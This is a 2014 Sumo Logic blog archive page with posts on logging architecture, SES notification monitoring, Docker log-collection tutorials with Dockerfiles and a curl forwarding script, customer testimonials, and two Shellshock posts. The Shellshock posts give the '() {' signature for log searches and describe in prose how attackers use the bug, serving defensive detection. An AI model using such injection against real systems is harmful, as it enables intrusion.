Blog › Use Cases

Derek Hall

Become Friends with Metadata to Maximize Efficiency in Sumo Logic

10.16.2014 | Posted by Derek Hall

Cloud Log Management for Control Freaks

10.02.2014 | Posted by Bright Fulton

The following is a guest post from Bright Fulton, Director of Engineering Operations at Swipely.

Like other teams that value their time and focus, Swipely Engineering strongly prefers partnering with third party infrastructure, platform, and monitoring services. We don’t, however, like to be externally blocked while debugging an issue or asking a new question of our data. Is giving up control the price of convenience? It shouldn’t be. The best services do the heavy lifting for you while preserving flexibility. The key lies in how you interface with the service: stay in control of data ingest and code extensibility.

A great example of this principle is Swipely’s log management architecture. We’ve been happily using Sumo Logic for years. They have an awesome product and are responsive to their customers. That’s a strong foundation, but because logging is such a vital function, we retain essential controls while taking advantage of all the power that Sumo Logic provides.


Get the benefits

Infrastructure services have flipped our notion of stability: instead of being comforted by long uptime, we now see it as a liability. Instances start, do work for an hour, terminate. But where do the logs go? One key benefit of a well integrated log management solution is centralization: stream log data off transient systems and into a centralized service.

Once stored and indexed, we want to be able to ask questions of our logs, to react to them. Quick answers come from ad-hoc searches:

  • How many times did we see this exception yesterday?

  • Show me everything related to this request ID.

Next, we define scheduled reports to catch issues earlier and shift toward a strategic view of our event data.

  • Alert me if we didn’t process a heartbeat job last hour.

  • Send me a weekly report of which instance types have the worst clock skew.

Good cloud log management solutions make this centralization, searching, and reporting easy.


Control the data

It’s possible to get these benefits without sacrificing control of the data by keeping the ingest path simple: push data through a single transport agent and keep your own copy. Swipely’s logging architecture collects with rsyslog and processes with Logstash before forwarding everything to both S3 and Sumo Logic.

Swipely’s Logging Architecture

Put all your events in one agent and watch that agent.

You likely have several services that you want to push time series data to: logs, metrics, alerts. To solve each concern independently could leave you with multiple long running agent processes that you need to install, configure, and keep running on every system. Each of those agents will solve similar problems of encryption, authorization, batching, local buffering, back-off, updates. Each comes with its own idiosyncrasies and dependencies. That’s a lot of complexity to manage in every instance.

The lowest common denominator of these time series event domains is the log. Simplify by standardizing on one log forwarding agent in your base image. Use something reliable, widely deployed, open source. Swipely uses rsyslog, but more important than which one is that there is just one.

Tee time

It seems an obvious point, but control freaks shouldn’t need to export their data from third parties. Instead of forwarding straight to the external service, send logs to an aggregation server first. Swipely uses Logstash to receive the many rsyslog streams. In addition to addressing vendor integrations in one place, this point of centralization allows you to:

  • Tee your event stream. Different downstream services have different strengths. Swipely sends all logs to both Sumo Logic for search and reporting and to S3 for retention and batch jobs.

  • Apply real-time policies. Since Logstash sees every log almost immediately, it’s a great place to enforce invariants, augment events, and make routing decisions. For example, logs that come in without required fields are flagged (or dropped). We add classification tags based on source and content patterns. Metrics are sent to a metric service. Critical events are pushed to an SNS topic.


Control the code

The output is as important as the input. Now that you’re pushing all your logs to a log management service and interacting happily through search and reports, extend the service by making use of indexes and aggregation operators from your own code.

Wrap the API

Good log management services have good APIs and Sumo Logic has several. The Search Job API is particularly powerful, giving access to streaming results in the same way we’re used to in their search UI.

Swipely created the sumo-search gem in order to take advantage of the Search Job API. We use it to permit arbitrary action on the results of a search.

Custom alerts and dashboards

Bringing searches into the comfort of the Unix shell is part of the appeal of a tool like this, but even more compelling is bringing them into code. For example, Swipely uses sumo-search from a periodic job to send alerts that are more actionable than just the search query results. We can select the most pertinent parts of the message and link in information from other sources. 

Engineers at Swipely start weekly tactical meetings by reporting trailing seven day metrics. For example: features shipped, slowest requests, error rates, analytics pipeline durations. These indicators help guide and prioritize discussion. Although many of these metrics are from different sources, we like to see them together in one dashboard. With sumo-search and the Search Job API, we can turn any number from a log query into a dashboard widget in a couple lines of Ruby.


Giving up control is not the price of SaaS convenience. Sumo Logic does the heavy lifting of log management for Swipely and provides an interface that allows us to stay flexible. We control data on the way in by preferring open source tools in the early stages of our log pipeline and saving everything we send to S3. We preserve our ability to extend functionality by making their powerful search API easy to use from both shell and Ruby.

We’d appreciate feedback (@swipelyeng) on our logging architecture. Also, we’re not really control freaks and would love pull requests and suggestions on sumo-search!

Vivek Kaushal

Debugging Amazon SES message delivery using Sumo Logic

10.02.2014 | Posted by Vivek Kaushal

 

We at Sumo Logic use Amazon SES (Simple Email Service) for sending thousands of emails every day for things like search results, alerts, account notifications etc. We need to monitor SES to ensure timely delivery and know when emails bounce.

Amazon SES provides notifications about status of email via Amazon SNS (Simple Notification Service). Amazon SNS allows you to send these notifications to any HTTP endpoint. We ingest these messages using Sumo Logic’s HTTP Source.

Using these logs, we have identified problems like scheduled searches which always send results to an invalid email address; and a Microsoft Office 365 outage when a customer reported having not received the sign up email.

 

Here’s a step by step guide on how to send your Amazon SES notifications to Sumo Logic.

1. Set Up Collector. The first step is to set up a hosted collector in Sumo Logic which can receive logs via HTTP endpoint. While setting up the hosted collector, we recommend providing an informative source category name, like “aws-ses”.  

2. Add HTTP Source. After adding a hosted collector, you need to add a HTTP Source. Once a HTTP Source is added, it will generate a URL which will be used to receive notifications from SNS. The URL looks like https://collectors.sumologic.com/receiver/v1/http/ABCDEFGHIJK.  

3. Create SNS Topic. In order to send notifications from SES to SNS, we need to create a SNS topic. The following picture shows how to create a new SNS topic on the SNS console. We uses “SES-Notifications” as the name of the topic in our example.

4. Create SNS Subscription. SNS allows you to send a notification to multiple HTTP Endpoints by creating multiple subscriptions within a topic. In this step we will create one subscription for the SES-Notifications topic created in step 3 and send notifications to the HTTP endpoint generated in step 2.

5. Confirm Subscription. After a subscription is created, Amazon SNS will send a subscription confirmation message to the endpoint. This subscription confirmation notification can be found in Sumo Logic by searching for: _sourceCategory=<name of the sourceCategory provided in step 1>

For example: _sourceCategory=aws-ses 

Copy the link from the logs and paste it in your browser.

6. Send SES notifications to SNS. Finally configure SES to send notifications to SNS. For this, go to the SES console and select the option of verified senders on the left hand side. In the list of verified email addresses, select the email address for which you want to configure the logs. The page looks like

On the above page, expand the notifications section and click edit notifications. Select the SNS topic you created in step 3.

 

7. Switch message format to raw (Optional). SES sends notifications to SNS in a JSON format. Any notification sent through SNS is by default wrapped into a JSON message. Thus in this case, it creates a nested JSON, resulting in a nearly unreadable message. To remove this problem of nested JSON messages, we highly recommend configuring SNS to use raw message delivery option.

Before setting raw message format

After setting raw message format

 

 

JSON operator was used to easily parse the messages as show in the queries below:

1. Retrieve general information out of messages
_sourceCategory=aws-ses | json “notificationType”, “mail”, “mail.destination”, “mail.destination[0]“, “bounce”, “bounce.bounceType”, “bounce.bounceSubType”, “bounce.bouncedRecipients[0]” nodrop

2. Identify most frequently bounced recipients
_sourceCategory=aws-ses AND !”notificationType\”:\”Delivery” | json “notificationType”, “mail.destination[0]” as type,destination  nodrop | count by destination | sort by _count

Vera Chen

We are Shellshock Bash Bug Free Here at Sumo Logic, but What about You?

10.01.2014 | Posted by Vera Chen

Be Aware and Be Prepared

I am betting most of you have heard about the recent “Shellshock Bash Bug”.  If not, here is why you should care – this bug has affected users of Bash, which is one of the most popular utilities installed on operating systems today.  Discovered in early September 2014, this extremely severe bug affects bash versions dating back to version 1.13 and has the ability to process shell commands after function definitions in Bash that exposes systems to security threats.  This vulnerability allows remote attackers to execute any shell command and gain access to internal data, publish malicious code, reconfigure environments and exploit systems in infinite ways.

Shellshock Bash Bug Free, Safe and Secure

None of the Sumo Logic service components were impacted due to the innate design of our systems.  However, for those of you out there who might have fallen victim to this bug based on your system architecture, you’ll want to jump in quickly to address potential vulnerabilities. 

What We Can Do for You

If you have been searching around for a tool to expedite the process of identifying potential attacks on your systems, you’re in the right place!  I recommend that you consider Sumo Logic and especially our pattern recognition capability called LogReduce.  Here is how it works – the search feature enables you to search for the well known “() {“ Shellshock indicators while the touch of the LogReduce button effectively returns potential malicious activity for you to consider.  Take for instance a large group of messages that could be a typical series of ping requests, LogReduce separates messages by their distinct signatures making it easier for you to review those that differ from the norm.  You can easily see instances of scans, attempts and real attacks separated into distinct groups.  This feature streamlines your investigation process to uncover abnormalities and potential attacks.  Give it a try and see for yourself how LogReduce can reveal to you a broad range of remote attacker activity from downloads of malicious files to your systems, to internal file dumps for external retrieval, and many others.

Witness it Yourself

Check out this video to see how our service enables you to proactively identify suspicious or malicious activity on your systems: Sumo Logic: Finding Shellshock Vulnerabilities

Give Us a Try

For those of you, who are completely new to our service, you can sign up for a Free 30 day trail here: Sumo Logic Free 30 Day Trial

 

Sanjay Sarathy, CMO

Why Do DevOps Shops Care About Machine Data Analytics?

09.30.2014 | Posted by Sanjay Sarathy, CMO

Introduction

The IT industry is always changing, and at the forefront today is the DevOps movement.  The whole idea of DevOps is centered around helping businesses become more responsive to user requests and adapt faster to market conditions. Successful DevOps rollouts count on the ability to rapidly diagnose application issues that are hidden in machine data. Thus, the ability to quickly uncover patterns and anomalies in your logs is paramount. As a result, DevOps shops are fast becoming a sweet spot for us. Yes, DevOps can mean so many things – lean IT methodologies, agile software development, programmable architectures, a sharing culture and more.  At the root of it all is data, especially machine data.

DevOps job trends have literally exploded onto the scene, as the graphic below indicates.

In the midst of this relatively recent boom, DevOps teams have been searching for tools that help them to fulfill their requirements. Sumo Logic is a DevOps shop and at DevOps Days in Austin, we detailed our our own DevOps scale-up. We covered everything from culture change, to spreading knowledge and the issues that we faced. The result has been that our machine data analytics service is not only incredibly useful to us as a DevOps organization but provides deep insights for any organization looking to optimize its processes.

Sumo Logic At Work In A DevOps Setting

The very notion of software development has been rocked to its core by DevOps, and that has been enabled by rapid analysis in the development lifecycle. Sumo Logic makes it possible to easily integrate visibility into any software infrastructure and monitor the effects of changes throughout development, test and production environments. Data analysis can now cast a wide net and with our custom dashboards and flexible integration, can take place anywhere you can put code. Rapid cause-and-effect, rapid error counts, and rapid analysis mean rapid software development and code updating. If user performance has been an issue, DevOps and Sumo Logic can address those experiences as well through analytic insight from relevant data sources in your environment. That makes for better software for your company and your customers. It also means happier developers and we know that hasn’t traditionally been an easy task.

Sumo Logic offers an enterprise scale cloud-based product that grows as a business grows. TuneIn, a well-known internet radio and podcast platform utilizes Sumo Logic, and in a recent guest post, their development teams shared how they used our technology to create custom searches and alerts for errors and exceptions in the logs, allowing them to reduce overall error rates by close to twenty percent. Another Sumo Logic customer, PagerDuty shared their story of a rapid Sumo Logic DevOps deployment and reaching their ROI point in under a month:

Flexibility, speed, scalability, and extensibility – these are the kind of qualities in their commercial tools that DevOps shops are looking for. Netskope is a cloud based security company and a DevOps shop that has integrated Sumo Logic into their cloud infrastructure. In this video, they describe the value of Sumo Logic to provide instant feedback into the performance and availability of their application.

Today, DevOps teams around the world are using Sumo Logic to deliver the insights they need on demand. With Sumo Logic supporting DevOps teams throughout their application lifecycle, organizations are able to deliver on the promise of their applications and fulfill their business goals.

LogReduce vs Shellshock

09.25.2014 | Posted by Joan Pepin, VP of Security/CISO

 

Shellshock is the latest catastrophic vulnerability to hit the Internet. Following so closely on the heels of Heartbleed, it serves as a reminder of how dynamic information security can be.

(NOTE: Sumo Logic was not and is not vulnerable to this attack, and all of our BASH binaries were patched on Wednesday night.)

Land-Grab

Right now there is a massive land-grab going on, as dozens of criminal hacker groups (and others) are looking to exploit this widespread and serious vulnerability for profit. Patching this vulnerability while simultaneously sifting through massive volumes of data looking for signs of compromise is a daunting task for your security and operations teams. However, Sumo Logic’s patent pending LogReduce technology can make this task much easier, as we demonstrated this morning.

Way Big Data

While working with a customer to develop a query to show possible exploitation of Shellshock, we saw over 10,000 exploitation attempts in a fifteen minute window. It quickly became clear that a majority of the attempts were being made by their internal scanner. By employing LogReduce we were able to very quickly pick out the actual attack attempts from the data-stream, which allowed our customer to focus their resources on the boxes that had been attacked.

 

Fighting the Hydra

From a technical perspective, the Shellshock attack can be hidden in any HTTP header; we have seen it in the User-Agent, the Referrer, and as part of the GET request itself. Once invoked in this way, it can be used to do anything from sending a ping, to sending an email, to installing a trojan horse or opening a remote shell. All of which we have seen already today. And HTTP isn’t even the only vector, but rather just one of many which may be used, including DHCP.

So- Shellshock presents a highly flexible attack vector and can be employed in a number of ways to do a large variety of malicious things. It is is so flexible, there is no single way to search for it or alert on it that will be completely reliable. So there is no single silver bullet to slay this monster, however, LogReduce can quickly shine light on the situation and wither it down to a much less monstrous scale.

We are currently seeing many different varieties of scanning, both innocent and not-so-innocent; as well as a wide variety of malicious behavior, from directly installing trojan malware to opening remote shells for attackers. This vulnerability is actively being exploited in the wild this very second. The Sumo Logic LogReduce functionality can help you mitigate the threat immediately.

Ben Newton, Senior Product Manager

Piercing the Fog in a Devops World

09.22.2014 | Posted by Ben Newton, Senior Product Manager

Fog on I-280

Two things still amaze me about the San Francisco Bay area two years on after moving here from the east coast – the blindingly blue, cloudless skies – and the fog. It is hard to describe how beautiful it is to drive up the spine of the San Francisco Peninsula on northbound I-280 as the fog rolls over the Santa Cruz mountains. You can see the fog pouring slowly over the peaks of the mountains, and see the highway in front of you disappear into the white, fuzzy nothingness of its inexorable progress down the valley. There is always some part of me that wonders what will happen to my car as I pass into the fog. But then I look at my GPS, know that I have driven this road hundreds of times, and assure myself that my house does still exist in there – somewhere.

The Viaduct

Now, I can contrast that experience with learning to drive in the Blue Ridge Mountains of North Carolina. Here’s the background – It’s only my second time behind the wheel, and my Mom takes me on this crazy stretch of road called the Viaduct. Basically, imagine a road hanging off the side of a mountain, with a sheer mountain side on the one side, and a whole lot of nothing on the other. Now, imagine that road covered in pea-soup fog with 10 ft visibility, and a line of a half dozen cars being led by a terrified teenager with white knuckled hands on the wheel of a minivan hoping he won’t careen off the side of the road to a premature death.  Completely different experience.

So, what’s the difference between those two experiences. Well, 20 years of driving, and GPS for starters. I don’t worry about driving into the thick fog as I drive home because I have done it before, I know exactly where I am, how fast I am going, and I am confident that I can avoid obstacles. That knowledge, insight, and experience make all the difference between an awe-inspiring journey and a gut-wrenching nail-biter. This is really not that different from running a state of the art application. Just like I need GPS and experience to brave the fog going home, the difference between confidently innovating and delighting your customers, versus living in constant fear of the next disaster, is both driven by technology and culture. Here are some ways I would flesh out the analogy:

GPS for DevOps

An app team without visibility into their metrics and errors is a team that will never do world-class operations. Machine Data Analytics provides the means to gather the telemetry data and then provide that insight in real-time. This empowers App Ops and DevOps teams to move more quickly and innovate.

Fog Lights for Avoiding Obstacles

You can’t avoid obstacles if you can’t see them in time. You need the right real-time analytics to quickly detect  issues and avoid them before they wreck your operations.

Experience Brings Confidence

If you have driven the road before, it is always increases confidence and speed. Signature-Based anomaly detection means that the time that senior engineers put in to classify previous events gives the entire team the confidence to classify and debug issues.

 

So, as you drive your Application Operations and DevOps teams to push your application to the cutting edge of performance, remember that driving confidently into the DevOps fog is only possible with the right kind of visibility.

 

Images linked from:

  • http://searchresearch1.blogspot.com/2012/09/wednesday-search-challenge-9512-view-of.html
  • http://www.blueridgerunners.org/LinnCove.jpg
Mike Cook

Why TuneIn Chose Sumo Logic For Machine Data Analytics

09.15.2014 | Posted by Mike Cook

The following is a guest post from Mike Cook, Director of Technical Operations at TuneIn.

Introduction

TuneIn is a rapidly growing service that allows consumers to listen to over 100,000 radio stations and more than four million podcasts from every continent. During the recently held Soccer World Cup, over 10.5 million people listened live to the games on radio stations streamed via TuneIn, one of the biggest events in our company’s history.

The State of Machine Data Analytics, pre-Sumo Logic

We had no consolidated strategy to analyze our logs, across our systems and applications alike. As a result and especially because of our rapid growth, troubleshooting and event correlation became manual and increasingly painful affairs that involved looking at individual server and application logs. We tried internal tools including syslog-ng and rsyslog, but the maintenance and overhead costs on a lean IT team were too high.

Why Sumo Logic?

There were a number of reasons why Sumo Logic was appealing to us:

  • As a cloud-based service, Sumo Logic immediately offloaded the maintenance issues we had to deal with running our own home-grown log management infrastructure.
  • With pre-built support for a number of infrastructure components that TuneIn runs on, including AWS, Cisco, VMware, Windows/IIS and Linux, we were confident that we could get insights around our logs far faster than other options.
  • In addition, the Sumo Logic LogReduce technology provided a more robust investigation tool to find root causes of issues that traditional monitoring tools just can’t detect.
  • Finally, Sumo Logic provides a compelling business value for what we are trying to accomplish

Internal Adoption of Sumo Logic

We started with creating basic dashboards and alerts around our key operating system logs. As the application development teams realized the value of what Sumo Logic could provide them, we added additional log sources and launched a series of lunch-and-learns to demonstrate the value of the service. These lunch-and-learns have rapidly broadened the adoption of Sumo Logic across TuneIn. We’re now seeing support teams using it to get customer statistics; different development teams using it to analyze API performance; and the executive team getting overall visibility through real-time dashboards.

Business Benefits

It didn’t take us long to see the benefit of Sumo Logic. Since TuneIn is a distributed PaaS, it was frequently difficult to correspond and troubleshoot issues in a particular API. Time to resolution began to drop from several hours to several minutes as developer and operations staff can search and pinpoint issues. Our development teams were quick to create custom searches and alerts for errors and exceptions in the logs, allowing us to reduce overall error rates by close to 20%. Without Sumo Logic we wouldn’t have even known most of those errors were even occurring. We’re just scratching the surface with Sumo Logic. We’re continue to expand our usage and gain critical insight into API performance, what our most popular user activities are, and where our application bottlenecks are. Sumo Logic isn’t just a log consolidation tool, it also serves as a critical tool in our Business Intelligence toolbox.

Dwayne Hoover, Senior Sales Engineer

Four Ways to Collect Docker Logs in Sumo Logic

09.03.2014 | Posted by Dwayne Hoover, Senior Sales Engineer

Docker is incredibly popular right now and is changing the way sysadmins, developers and engineers go about their day to day lives.  This walkthrough isn’t going to introduce you to Docker, I’ll assume that you know what it is and how to use it.  If not, don’t worry, here is a great place to start: What is Docker?

With Sumo Logic’s firm entrenchment in the DevOps and cloud culture, it’s no surprise that a large number of our customers are utilizing Docker.  Some are already pushing their Docker related logs and machine data to Sumo Logic, others have reached out with some interesting use cases for guidance and best practices to getting their valuable machine data into Sumo Logic.  This post will walk you through a few scenarios which will ultimately result in your machine data in one centralized location for troubleshooting and monitoring.

Four (OK, Five) Ways to Push Your Logs from Docker into Sumo Logic

  1. Install a Sumo Logic collector per container
  2. Collect local JSON logs from the host
  3. Stream the live logs from your container to a Sumo Logic HTTP endpoint
  4. Bind your containers to a volume on the host and collect from there
  5. *BONUS* Install a collector running in a helper container

Install a Sumo Logic Collector per Container

Before the Docker purists jump all over this one, let me clarify that I’m fully aware that this method may invoke some heated debate.  If you are a one application/service and one application/service only per container individual, then skip to the next method.  Otherwise, thanks for sticking around.

In this approach, we will install an ephemeral collector as part of a container build, deploy a sumo.conf file to provide authentication (and other information) and optionally, deploy a sources.json file to provide paths to log files.

Here is an example Dockerfile to accomplish this task.  Note, I deployed MongoDB as an example application, but this could represent any application, just modify accordingly.

# Sumo Logic docker
# VERSION 0.3
# Adjusted to follow approach outlined here:
# http://paislee.io/how-to-add-sumologic-to-a-dockerized-app/
FROM phusion/baseimage:latest
MAINTAINER Dwayne Hoover
ADD https://collectors.sumologic.com/rest/download/deb/64 /tmp/collector.deb
ADD sumo.conf /etc/sumo.conf
# ADD sources.json /etc/sources.json

# ensure that the collector gets started when you launch
ADD start_sumo /etc/my_init.d/start_sumo
RUN chmod 755 /etc/my_init.d/start_sumo

# this start_sumo file should look something like this (minus the comments)
# #!/bin/bash
# service collector start

# install deb
RUN dpkg -i /tmp/collector.deb

# let’s install something
# put your own application here
RUN apt-key adv –keyserver hkp://keyserver.ubuntu.com:80 –recv 7F0CEB10
RUN echo ‘deb http://downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen’ | tee /etc/apt/sources.list.d/mongodb.list
RUN apt-get update
RUN apt-get install -y -q mongodb-org
# Create the MongoDB data directory
RUN mkdir -p /data/db
EXPOSE 27017

# ensure that mongodb gets started when you launch
ADD start_mongo /etc/my_init.d/start_mongo
RUN chmod 755 /etc/my_init.d/start_mongo

CMD /sbin/my_init

It’s worth noting that the container will start the services specified in the scripts deployed to your /etc/my_init.d directory by issuing the /sbin/my_init command at container launch.  Unless specified, logs will go straight to STDOUT and will not be available via path from the Sumo Logic UI using the collector that you just installed.  However, you can add logs from /var/log just as if it were a standard Linux image: 

docker source 1

Let’s add the Sumo Logic collector logs as well:

docker source 2 

And now, we have log data flowing in:

docker collectors status

Simply add the additional paths that you are interested in gathering machine data from and it will flow into your Sumo Logic account while the container is running. 

Collect Local JSON Logs From the Docker Host

If you would like to see all of the log data from all of your containers, it’s as easy as installing a collector on the Docker host and pointing it to the
directory containing the container logs.  Follow the instructions here to deploy a collector

Once installed and registered, point it to the Docker logs:

docker source local

The default path for the docker logs are in: /var/lib/docker/containers/[container id]/[container-id]-json.log

These logs are in JSON format and are easily parsed using our anchor based parse or JSON operator.  For more information, see the following:

http://help.sumologic.com/Help/Default.htm#Parse__Anchor_.htm
http://help.sumologic.com/Help/Default.htm#JSON_Operator.htm

Stream the Live Logs From a Container to a Sumo Logic HTTP Endpoint

If you don’t want to install a collector, you can use a “Hosted Collector” and push your log messages from a container to your unique HTTP endpoint.  This is done on the Docker host and utilizes the “docker logs” command.

 First, configure a hosted collector with a HTTP Source:
http://help.sumologic.com/Help/Default.htm#Setting_up_a_Hosted_Collector.htm
http://help.sumologic.com/Help/Default.htm#Configuring_an_HTTP_Source.htm

add new collector

 

HTTP Source

The basic steps here are to choose “Add Collector” then “Hosted Collector” and choose “Add Source” selecting HTTP.  Once the source metadata is entered, you will be provided a unique URL that can accept incoming data via HTTP POST.  Scripting a basic wrapper for CURL will do the trick.  Here is an example:

#!/bin/bash
URL="https://collectors.sumologic.com/receiver/v1/http/[your unique URL]"
while read data;
do
     curl –data “$data” $URL
done

Edit the URL variable to match the unique URL you obtained when setting up the HTTP source. 

Using the docker logs command, you can follow the STDOUT data that your container is generating.  Assuming that we named our curl wrapper “watch-docker.sh” and we are running a container named “mongo_instance_002” we could issue a command like:

nohup sh -c 'docker logs --follow=true --timestamps=true mongo_instance_002 | ./watch-docker.sh' &

 While the container is running, its output will be sent directly to Sumo Logic.  Note that “follow” is set to true.  This ensures that we are collecting a live stream of the STDOUT data from the container.  I’ve also chosen to turn on timestamps so that Sumo Logic will use the timestamp from the docker logs command when the data is indexed. 

For more information on docker logs, go here.

Bind Your Containers to a Volume on the Host and Collect There

Docker provides the ability to mount a volume on the host to the container.  Without getting into too much detail about how to achieve this (different methods may be applicable for your needs), check out the Docker documentation here:

https://docs.docker.com/userguide/dockervolumes/

Assuming that your dockerized applications are logging to a predefined directory and that directory is mounted to the host filesystem, you can install a Sumo Logic collector on your Docker host and create a new source that monitors the shared volume that you are logging to.

Again, the instructions for setting up a collector and sources can be found here.

There are some concerns that this could open up a potential attack vector if your container is compromised, so please ensure that the necessary security measures have been put into place.  For internal use cases on an already secured environment, this is likely a non-factor.

*BONUS* Install a Collector Running in a “Helper” Container

Borrowing from Caleb Sotelo’s post it’s possible to stick to the “one process, one container” mentality, and run a Sumo Logic collector within its own Docker container.   

You can create a container that only contains a Sumo Logic collector.  Assuming that this container has the ability to see other containers in your Docker environment, you can configure data sources to pull logs from other containers.  This can be done over SSH using remote sources in Sumo Logic or by utilizing shared volumes and using Local File sources.

Setting up remote sources requires SSH access either via a shared key or username/password combo.  Here is some additional detail on setting up remote sources.

Please note, this is dependent upon the configuration of your Docker environment supporting communication between containers via SSH or shared volumes and is a bit out of scope for this walkthrough.  For some additional information, check these out:

Docker’s instructions on setting up volumes
The phusion baseimage that includes the SSH daemon and server

Caleb Sotelo

How To Add Sumo Logic To A Dockerized App

08.27.2014 | Posted by Caleb Sotelo

This is a guest post from Caleb Sotelo who is a software engineer at OpenX and has been reprinted with his permission.  You can view the original here.  

kuniyoshi_utagawa_the_sumo_wrestler

Sumo Logic is a nifty service that makes it easy watch and analyze your apps’ logs. You install a collector local to the app in question, point it at some files to watch, and your logs are sent to the cloud, where they can be sliced and diced from a nice web UI.

At a high level, Sumo Logic wants to transform big data logs into operational information. But at a practical level, it’s nice not to have to SSH to a production machine and tail or grep enormous files to take your app’s pulse. Not to mention the idea is totally in line with one of the Twelve Factors: treating logs as event streams enables better understanding of an app’s behavior over time.

I’ve had success using SumoLogic at OpenX, so I wanted to give their free tier a shot for a personal project. The only limitations are a 500MB of data per day limit and 7 days of retention. I was surprised not to find anything on the web for installing Sumo Logic alongside a Dockerized app, and I had a couple of Docker-based candidates. So without further ado, here’s how to add Sumo Logic to a Dockerized app:

1. Sign up for Sumo Logic Free

Head over to sumologic.com/signup to sign up. The only catch here is that you’ll need a company email address. For the project I’m going to use SumoLogic for, I own and manage my own domain, so it wasn’t too much trouble to create an email address using my registrar’s mail service. Since I host the domain separately, I did have to add an MX record to my zone file to point to the registrar’s mail server. For example, with DigitalOcean.

2. Download a Collector

Once you confirm your email address and log in, you be stepped through a process for downloading and installing a collector. I chose the Installed Collector and downloaded sumocollector_19.91-2_amd64.deb, becuase my Docker image is based on Ubuntu.

sumo_logic_choose_collector_screenshot

After downloading the collector, the setup wizard proceeds to a screen that spins until it detects a newly installed collector. I didn’t yet know how I was going to install it, and I got logged out of Sumo Logic anyway due to inactivity, so I abandoned the wizard at that point. The Sumo Logic UI changed itself as soon as it detected that my first collector had been installed.

  • As I plan to install the Sumo Logic collector during the docker build process, I uploaded the .deb file to a Dropbox and grabbed the public link to use later.

3. Create Access Keys

When a collector client is installed it has to have some way of authenticating to the Sumo Logic server. The docs for creating a sumo.conf file (we’ll get there soon) offer two choices: (1) provide your Sumo Logic email and password, or (2) provide access keys generated from the UI. The latter is recommended if only to avoid storing a username/password in plaintext. Keys can be generated from ManageCollectorsAccess KeysCreate.

4. Augment your Docker Container

Here’s the Docker-specific part of installing Sumo Logic. We’ll add some lines to our app’s Dockerfile and author two files that are ADDed to the container during a docker build. I assume working knowledge of Docker, but here is the list of Dockerfile commands for good measure.

4.1 Create sumo.conf

First create a sumo.conf file like the following:

name={collector_name}  
accessid={your_access_id}  
accesskey={your_access_key}  

 

where name is an arbitrary name for this collector, and accessid and accesskey are those generated in step 3. There are many more conf options specified here but the important ones, namely sources, can actually be configured through the UI later on.

By convention I put Docker-specific files into .docker/{resource}, so this one goes to .docker/sumo/sumo.conf. It’ll be referenced in our Dockerfile shortly.

4.2 Modify your Dockerfile

Add a block like the following to your Dockerfile (assumed to live in the root of your app’s code), preferably before your actual app is added:

# install sumologic
RUN apt-get -qq update  
RUN apt-get install -y wget  
RUN wget https://www.dropbox.com/path/to/sumocollector_19.91-2_amd64.deb  
RUN dpkg -i sumocollector_19.91-2_amd64.deb  
RUN rm sumocollector_19.91-2_amd64.deb  
ADD .docker/sumo/sumo.conf /etc/sumo.conf  
ADD .docker/sumo/start_sumo /etc/my_init.d/start_sumo  

 

Let’s break this down:

RUN apt-get -qq update  

Update sources. This may not be necessary, but I like to put this before each dependancy installed by my Dockerfile to avoid issues with image caching.

RUN apt-get install -y wget  
RUN wget https://www.dropbox.com/path/to/sumocollector_19.91-2_amd64.deb  

We’ll use wget to grab the collector file we uploaded in step 2. You may opt to ADD the file locally, but this option avoids having to check the resource into your app’s source code, while housing it in a consistent location. Better practice would be to store it in some kind of artifact repository and version it.

RUN dpkg -i sumocollector_19.91-2_amd64.deb  
RUN rm sumocollector_19.91-2_amd64.deb  

Install the debian package and clean up.

ADD .docker/sumo/sumo.conf /etc/sumo.conf  

Copy the newly created sumo.conf file to the place where the collector expects to find it.

Before we get to the last line, let’s pause. If you were able to catch the output from installing the collector, you saw something like:

Preparing to unpack sumocollector_19.91-2_amd64.deb ...
Unpacking sumocollector (1:19.91-2) ...
Setting up sumocollector (1:19.91-2) ...
configuring collector....
configuring collector to run as root
Detected Ubuntu:
Installing the SumoLogic Collector daemon using init.d..
 Adding system startup for /etc/init.d/collector ...
   /etc/rc0.d/K20collector -> ../init.d/collector
   /etc/rc1.d/K20collector -> ../init.d/collector
   /etc/rc6.d/K20collector -> ../init.d/collector
   /etc/rc2.d/S20collector -> ../init.d/collector
   /etc/rc3.d/S20collector -> ../init.d/collector
   /etc/rc4.d/S20collector -> ../init.d/collector
   /etc/rc5.d/S20collector -> ../init.d/collector
Collector has been successfully installed. Please provide account credential in /etc/sumo.conf and start it up via service or init.d script!

 

It was only after sifting through my docker output that I saw this and learned about the existence of a sumo.conf file. Before that, nothing was happening in the Sumo Logic UI because no collector had been correctly installed and started, even when I started the container. Anyway, we got /etc/sumo.conf out of the way, so what about starting it up “via service or init.d script”?

My solution was to include a simple bash script that starts the collector service on startup. But my Dockerfile extends phusion/baseimage-docker, which uses a custom init system. So the last Dockerfile command,

ADD .docker/sumo/start_sumo /etc/my_init.d/start_sumo  

adds a file called start_sumo like:

#!/bin/bash
service collector start  

into /etc/my_init.d. Make sure it’s executable with chmod +x. Like the conf file, this is saved into .docker/sumo/start_sumo of the app code repository.

I am very open to more elegant ways for getting the Sumo Logic collector to start. I’d also like to see how non-baseimage users deal with init requirements. I would have done this as a runit script as recommended by the baseimage-docker README, but the collector script appears to automatically daemonize itself, which breaks runit.

5. Build and Deploy!

I ran docker build and docker run as usual, and voilà!, the newly installed collector popped up in ManageCollectors.

6. Configure Sources

Before we start seeing logs, we have to tell Sumo what a log file is. I clicked ManageCollectorsAddAdd Source and added a Local File entry that had the absolute path to a log file I was interested in. One of the Sumo Logic videos I watched noted that specifying /path/to/log/dir/** will pick up all log files in a directory.

sumo_logic_manage_collectors_screenshot

I waited a couple of minutes, and log messages started coming into the UI. Sweet! Keep in mind that multiple sources can be added for a single collector.


So far, I’ve learned that I can get a bird’s eye view of all my logs from ManageStatus, and look at actual log messages from Search. I haven’t spent time really getting to know the various queries yet, but if they’re worth writing about, expect another post.

Possible Improvement: The above example installs Sumo Logic inside the app container. An alternate approach might have Sumo installed on the host (or in its own Docker container), reading log files from a shared data volume. This has the benefits of (1) requiring only a single Sumo Logic install for potentially more than one app container, and (2) architectural separation of app from log consumption.

That’s it! This turned out to be surprisingly simple. Kudos to Sumo Logic for offering an easy to use service + free tier that’s totally feasible for smallish apps.

Twitter